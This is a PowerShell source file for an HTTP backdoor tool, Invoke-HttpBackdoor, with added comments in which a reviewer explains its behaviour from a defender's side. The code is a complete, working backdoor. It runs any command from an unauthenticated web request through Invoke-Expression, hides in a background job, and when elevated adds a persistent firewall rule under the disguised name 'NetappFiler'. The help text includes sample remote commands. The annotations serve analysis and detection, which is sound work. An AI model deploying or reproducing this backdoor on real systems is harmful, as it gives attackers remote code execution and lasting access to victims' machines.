Function Invoke-HttpBackdoor {
<#
.NAME
Invoke-HttpBackdoor
.SYNOPSIS
Invoke-HttpBackdoor
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
.DESCRIPTION
This function creates an HTTP backdoor on a specified port as a background job.
.LINK
http://www.obscuresec.com/
http://ps1.soapyfrog.com/wp-content/uploads/2007/01/httpdps1.txt
.NOTES
To send the HttpBackdoor commands:
http://backdoorhost/?api/settings/session=ipconfig
http://backdoorhost/?api/settings/session=net%20users
#>
# Reviewer overview (defender's reading of what the code below does):
#   * The $Initializer script block is turned into text, the REPLACEME0 placeholder
#     is swapped for $Port, and the result is recompiled and handed to Start-Job, so
#     the listener runs in a child PowerShell job process, not in this session.
#   * The job binds Net.HttpListener to http://*:<port>/ and passes the value of the
#     'api/settings/session' query-string key straight to Invoke-Expression. There is
#     no authentication and no allow-list on that path.
#   * When run elevated with the firewall on, an allow rule named 'NetappFiler' is
#     added and never removed by this function, so it outlives the job.
#   Durable/observable artefacts visible here: the listener prefix on the chosen
#   port, the job's child process, the firewall rule name, and the executed
#   command text (which script block logging would be expected to capture).
# NOTE(review): .NAME is not a standard comment-based help keyword; Get-Help may
# ignore the whole help block because of it — confirm.
[CmdletBinding()] Param (
[Parameter(Position = 0)]
[ValidateRange(1,65535)]
[Int32]
# The default is a string literal; the [Int32] constraint converts it to 8888.
$Port = '8888'
)
# Not executed directly: stringified, patched and recompiled in the Try block below.
$Initializer = {
Function HttpBackdoor {
# Placeholder substituted with the port number by the -replace at job creation.
$ListenPort = "REPLACEME0"
# Query-string key whose value gets executed.
$DirectoryString = 'api/settings/session'
$HttpListenerObject = New-Object Net.HttpListener
# Wildcard host part: listens on every interface. A non-elevated process typically
# needs a URL ACL for a wildcard prefix — presumably why the admin/firewall checks
# exist below; confirm on the target OS version.
$ObjectPrefix = "http://*:$ListenPort/"
# $ObjectPrefix is a single string, so this loop body runs once.
Foreach ($Object in $ObjectPrefix) {
$HttpListenerObject.Prefixes.Add($Object)
}
$HttpListenerObject.Start()
$Continue = $True
# One request per iteration; GetContext() blocks until a request arrives.
While ($Continue) {
$ListenerContext = $HttpListenerObject.GetContext()
$HttpResponse = $ListenerContext.Response
$HttpResponse.Headers.Add("Content-Type","text/plain")
$StreamWriterObject = New-Object IO.StreamWriter($HttpResponse.OutputStream,[Text.Encoding]::UTF8)
$HttpRequest = $ListenerContext.Request
# NOTE(review): the [string] cast turns a missing key ($null) into "", so the
# $null case in the Switch is unlikely to ever match; a request without the key
# appears to fall through to Default with an empty command — confirm.
[string] $HttpParameter = $HttpRequest.QueryString[$DirectoryString]
Switch ($HttpParameter) {
# "logout" ends the loop once this (empty) response has been closed.
"logout" {$Continue = $False; Break}
$null {$StreamWriterObject.WriteLine("HTTP Error 403: Forbidden"); Break}
Default {
$Count = 0
# Remote code execution point: the raw query value is evaluated and each line of
# output is streamed back. This is the statement whose argument a defender would
# want logged (script block logging, transcription).
Invoke-Expression $HttpParameter | Out-String -Stream | foreach {
$StreamWriterObject.WriteLine($_.TrimEnd())
$Count++
}
# Zero output lines (including the empty-command case) is reported as a 404 body.
If ($Count -eq 0) {$StreamWriterObject.WriteLine('HTTP Error 404: Not Found')}
}
}
# Closing the writer closes the response's output stream, which completes the reply.
$StreamWriterObject.Close()
}
$HttpListenerObject.Stop()
}
}
Try {
#Check if Firewall is on
# Legacy Windows Firewall COM API: reads the enabled flag of the current profile only.
$FirewallStatus = (New-Object -com HNetCfg.FwMgr).localpolicy.CurrentProfile.FirewallEnabled
#Check for admin rights
# True when the current token is in the local Administrators role.
$AdminStatus = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
#Firewall no admin rights
If (($FirewallStatus -eq $True) -and ($AdminStatus -eq $False)) {
Write-Error "Not running as admin and the firewall is on. Run with elevated credentials"
Return
}
#Firewall with admin rights, open port
# Adds an allow rule (Protocol 6 = TCP; Profiles 7 = domain|private|public;
# Action 1 = allow; Direction left at the COM default) under an innocuous-looking
# name. Nothing in this function removes the rule, so it persists after the job
# ends — the rule name is the durable host artefact.
If (($FirewallStatus -eq $True) -and ($AdminStatus -eq $True)) {
$FirewallPolicyObject = New-Object -ComObject hnetcfg.fwpolicy2
$FirewallRuleObject = New-Object -ComObject HNetCfg.FWRule
$FirewallRuleObject.Name = 'NetappFiler'
$FirewallRuleObject.Protocol = 6
# NOTE(review): $LocalPort is not defined anywhere in this function (the parameter
# is $Port), so $null is assigned here; how the COM object treats that is not
# visible from this code — verify before relying on the port check below.
$FirewallRuleObject.LocalPorts = $LocalPort
$FirewallRuleObject.Enabled = $true
$FirewallRuleObject.Profiles = 7
$FirewallRuleObject.Action = 1
$FirewallPolicyObject.Rules.Add($FirewallRuleObject)
}
#Check if port is alread used
# Collects every currently listening TCP port and refuses to start on a collision.
$ListeningPorts = ([System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties().GetActiveTcpListeners()).port
If ($ListeningPorts -contains $Port) {
Write-Error "Port is already in use!"
Return
}
# -replace stringifies the script block, bakes the port in, and the text is recompiled.
$ScriptBlock = [ScriptBlock]::Create(($Initializer -replace 'REPLACEME0', $Port))
# The initialization script defines HttpBackdoor inside the job runspace and the job
# body calls it. Start-Job hosts the job in a child PowerShell process; the job
# object is discarded via Out-Null, so the caller gets no handle and must use
# Get-Job / Stop-Job to find or stop the listener.
Start-job -InitializationScript $ScriptBlock -ScriptBlock {HttpBackdoor} | Out-Null
}
Catch {
# NOTE(review): in argument mode '+' and the second expression are passed as extra
# positional arguments rather than concatenated, so this line likely fails with a
# parameter-binding error instead of reporting the original error — confirm.
Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage
}
}